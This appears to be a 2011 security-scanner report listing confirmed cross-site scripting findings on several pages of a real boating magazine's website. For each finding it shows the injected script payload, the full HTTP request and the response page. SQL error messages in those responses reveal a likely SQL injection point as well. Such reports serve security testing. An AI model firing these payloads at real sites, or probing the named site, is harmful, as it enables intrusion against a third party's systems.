P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00204E)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00204E)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/columns-blogs/new-england-fishing" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>New England Regional Fishing with Tim Coleman | Soundings Online Column</title> <link href="/columns-blogs/new-england-fishing?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/columns-blogs/new-england-fishing?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_columns_blogs c_ne_fishing m_ne_fishing"><!--
Type of page: category<br />Section: 8, s_columns_blogs<br />Category: 62, c_ne_fishing<br />Menu: 99, m_ne_fishing-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE..
- /columns-blogs/bay-tripper

/columns-blogs/bay-tripper CONFIRMED

http://www.soundingsonline.com/columns-blogs/bay-tripper?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00204F)</script>

Request

GET /columns-blogs/bay-tripper?'"--></style></script><script>netsparker(0x00204F)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00204F)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00204F)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/columns-blogs/bay-tripper" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Stories of Boat Related Mishaps and Experiences | Soundings Online Column</title> <link href="/columns-blogs/bay-tripper?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/columns-blogs/bay-tripper?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_columns_blogs c_bay_tripper m_bay_tripper"><!--
Type of page: category<br />Section: 8, s_columns_blogs<br />Category: 59, c_bay_tripper<br />Menu: 98, m_bay_tripper-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRI..
- /

/ CONFIRMED

http://www.soundingsonline.com/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x002003)%3C/scr..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002003)</script>

Request

GET /?'"--></style></script><script>netsparker(0x002003)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002003)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002003)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Featuring Boating News, Stories and More | Soundings Online</title> <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_new_boats&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" 